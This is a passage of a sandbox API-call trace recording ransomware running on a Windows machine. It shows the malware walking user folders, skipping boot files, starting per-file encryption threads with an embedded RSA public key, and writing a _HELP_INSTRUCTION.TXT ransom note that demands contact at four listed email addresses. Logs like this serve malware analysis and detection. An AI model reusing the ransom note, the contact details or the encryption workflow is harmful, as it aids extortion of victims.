lpString1="AppData") returned="AppData" [0100.892] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0100.892] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.892] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0100.892] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0100.892] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0100.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0100.892] SetErrorMode (uMode=0x1) returned 0x1 [0100.892] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0100.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0100.892] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0100.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0100.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0100.892] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0100.892] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0100.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0100.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="Desktop") returned 0x0 [0100.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="DESKTOP") returned 0x0 [0100.892] SetErrorMode (uMode=0x1) returned 0x1 [0100.892] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT") returned 68 [0100.893] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0100.893] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0100.893] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x2d8) returned 0x0 [0100.893] RegQueryValueExW (in: hKey=0x2d8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cae278, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cae278*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0100.893] RegCloseKey (hKey=0x2d8) returned 0x0 [0100.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0100.893] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0100.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0100.937] CloseHandle (hObject=0x2d8) returned 1 [0100.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0100.938] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0100.938] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.938] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0100.938] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0100.938] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0100.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0100.938] SetErrorMode (uMode=0x1) returned 0x1 [0100.938] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0100.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0100.938] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0100.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0100.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0100.939] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0100.939] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0100.939] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0100.939] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0100.939] lstrcmpW (lpString1="278D60903B72BF40F401616C3FAFA388.XZZX", lpString2="..") returned 1 [0100.939] lstrcmpW (lpString1="278D60903B72BF40F401616C3FAFA388.XZZX", lpString2=".") returned 1 [0100.939] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0100.940] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="ntldr") returned 0x0 [0100.940] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="NTLDR") returned 0x0 [0100.940] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0100.940] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="ntdetect.com") returned 0x0 [0100.940] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0100.940] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0100.940] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0100.940] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.940] lstrcpyW (in: lpString1=0x17cf1c, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0100.940] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0100.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e8 [0100.940] Sleep (dwMilliseconds=0x96) [0101.098] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0101.098] lstrcmpW (lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX", lpString2="..") returned 1 [0101.098] lstrcmpW (lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX", lpString2=".") returned 1 [0101.098] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0101.098] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="ntldr") returned 0x0 [0101.098] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="NTLDR") returned 0x0 [0101.098] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0101.098] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0101.099] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0101.099] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0101.099] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0101.099] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.099] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0101.099] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ec [0101.099] Sleep (dwMilliseconds=0x96) [0101.249] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0101.249] lstrcmpW (lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpString2="..") returned 1 [0101.250] lstrcmpW (lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpString2=".") returned 1 [0101.250] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0101.250] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="ntldr") returned 0x0 [0101.250] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="NTLDR") returned 0x0 [0101.250] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0101.250] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0101.250] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0101.250] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0101.250] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0101.250] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.250] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0101.250] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0101.250] Sleep (dwMilliseconds=0x96) [0101.405] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0101.405] lstrcmpW (lpString1="63AB35AD17277526536F22E31B54596E.XZZX", lpString2="..") returned 1 [0101.405] lstrcmpW (lpString1="63AB35AD17277526536F22E31B54596E.XZZX", lpString2=".") returned 1 [0101.405] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0101.405] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="ntldr") returned 0x0 [0101.405] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="NTLDR") returned 0x0 [0101.405] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0101.405] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0101.405] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0101.405] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0101.406] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0101.406] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.406] lstrcpyW (in: lpString1=0x17cf1c, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0101.406] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c8 [0101.406] Sleep (dwMilliseconds=0x96) [0101.563] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0101.563] lstrcmpW (lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX", lpString2="..") returned 1 [0101.563] lstrcmpW (lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX", lpString2=".") returned 1 [0101.563] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0101.563] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="ntldr") returned 0x0 [0101.563] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="NTLDR") returned 0x0 [0101.563] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0101.563] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0101.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0101.563] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0101.563] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0101.563] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.563] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0101.563] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0101.564] Sleep (dwMilliseconds=0x96) [0101.718] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0101.718] lstrcmpW (lpString1="8DFF43342C68841C83BDE75D30616864.XZZX", lpString2="..") returned 1 [0101.718] lstrcmpW (lpString1="8DFF43342C68841C83BDE75D30616864.XZZX", lpString2=".") returned 1 [0101.718] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0101.718] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="ntldr") returned 0x0 [0101.718] StrStrW 